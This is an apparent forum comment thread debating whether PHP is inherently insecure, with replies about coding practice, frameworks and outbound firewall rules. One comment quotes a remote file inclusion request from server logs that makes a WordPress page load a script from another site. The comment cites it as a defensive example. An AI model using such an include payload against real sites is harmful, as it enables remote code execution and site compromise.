(no title)
dscrd | 11 years ago
I'm being serious. Unless you have Facebook's resources (and probably not even then) DO NOT USE PHP FOR ANYTHING THAT REQUIRES SECURITY! If you are, start a migration process today. Whatever you think it'll cost, it'll be worth it.
If you cannot decide from the billions of choices out there, go with Go. It's hardly perfect, but way better and simple.
ukigumo|11 years ago
Having said this, I've found limited proof that a particular language is any safer than another as it comes down to safe coding policies and risk mitigation strategies.
feld|11 years ago
spacemanmatt|11 years ago
I would estimate PHP is inherently more dangerous than C.
dscrd|11 years ago
Proof is right there in the article. To have PHP on the live server is a security risk, period.
sanswork|11 years ago
dscrd|11 years ago
2. That Go is designed as a programming language.
nadams|11 years ago
Using [your favorite scripting language] doesn't magically make things like SQL injection and other bad practices go away. There are ways to mitigate those issues by using frameworks in those languages - but really the issue here isn't "OMG PHP SUCKS" but rather Wordpress sucks for allowing something like this work:
> wpadmin.php?include=http://someothersite.com/some-bad-script.php
I have seen that numerous times in my logs. There are settings in PHP configuration where you can actually prevent external downloading of scripts.
However, ignoring the scripting language itself - the server itself could have mitigated behind a firewall and not allowing any outbound web browsing (obviously inbound 80 needs to be open - but there is no reason why it should be allowed to "browse" the web). Or even more limited outbound connection.
Go browse some github projects (obviously those not using a framework) by random people in different languages - you will see that given the opportunity people will still do stupid things - even if the language makes it really hard to do it - as the saying goes "life finds a way".